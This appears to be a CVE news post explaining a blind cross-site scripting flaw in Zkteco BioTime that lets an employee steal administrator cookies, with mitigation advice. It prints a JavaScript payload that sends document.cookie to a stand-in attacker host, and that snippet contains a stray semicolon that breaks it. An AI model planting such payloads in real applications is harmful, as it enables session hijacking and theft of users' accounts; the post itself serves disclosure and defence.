CVE CyberSecurity Database News

CVE-2022-38801: Zkteco BioTime < 8.5.3 Build:20200816.447 employee session hijack and cookie theft via blind cross-site scripting vulnerability

Poster -

Summary: In this long read post, we'll go over the exploit details of session hijacking and cookie theft by an employee for administrator users in Zkteco BioTime < 8.5.3 Build:20200816.447 using blind cross-site scripting (XSS).

Introduction

Zkteco BioTime is a web-based biometrics application designed for time attendance and employee management. However, it has been found that prior to version 8.5.3 Build:20200816.447, an employee can potentially hijack an administrator session and steal cookies through blind cross-site scripting (XSS). The vulnerability has been tagged as CVE-2022-38801.

Cross-Site Scripting (XSS) is a type of web security vulnerability that allows an attacker to inject malicious scripts into web pages viewed by other users, potentially causing a range of harmful actions. Blind XSS is a more subtle variation of the attack, which occurs when the injected script is stored on the server, and the attacker must wait for a vulnerable administrator to execute the injected script on their end.

Exploit Details

The exploit takes advantage of a lack of filtering on input fields in the BioTime application. An employee with access to the system can craft a malicious payload and store it in a user-accessible field, such as a name or an address. When an administrator user views or interacts with the data, the malicious script will execute on their computer or device, leading to session hijacking and cookie theft.

Code Snippet

This code snippet demonstrates a simple example of a blind XSS payload that can be inserted into a user-accessible field:

<script>
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      alert('Cookies captured!');
    }
  };
  var cookieData = encodeURIComponent(document.cookie);
  xhttp.open('GET', 'https://attacker-server.com/log_cookies?data='; + cookieData, true);
  xhttp.send();
</script>

With this script inserted into a field, an administrator who views the data containing the script will have their cookies sent to the attacker's server.

Original References:

- Zkteco BioTime Official Documentation: https://www.zkteco.com/UploadFile/Website-Download%20Files/Product/FAQ_2_20180727153450.pdf
- CVE-2022-38801 Official Listing: https://nvd.nist.gov/vuln/detail/CVE-2022-38801

There are two primary steps in mitigating this vulnerability

1. Update Zkteco BioTime: The issue has been fixed in the application version 8.5.3 Build:20200816.447, so updating to the latest version would eliminate the exploit.

2. Input Validation and Sanitization: Server administrators should implement proper validation and sanitization measures on user input fields to prevent the insertion of malicious scripts.

Conclusion

CVE-2022-38801 highlights the importance of input validation and sanitization. It demonstrates how employee users might exploit such vulnerabilities to launch blind XSS attacks against administrator users, leading to session hijacking and cookie theft. Updating to the latest version of Zkteco BioTime and ensuring proper input validation on user-accessible fields are essential steps in mitigating this security risk.

Timeline

Published on: 11/30/2022 14:15:00 UTC
Last modified on: 12/02/2022 15:12:00 UTC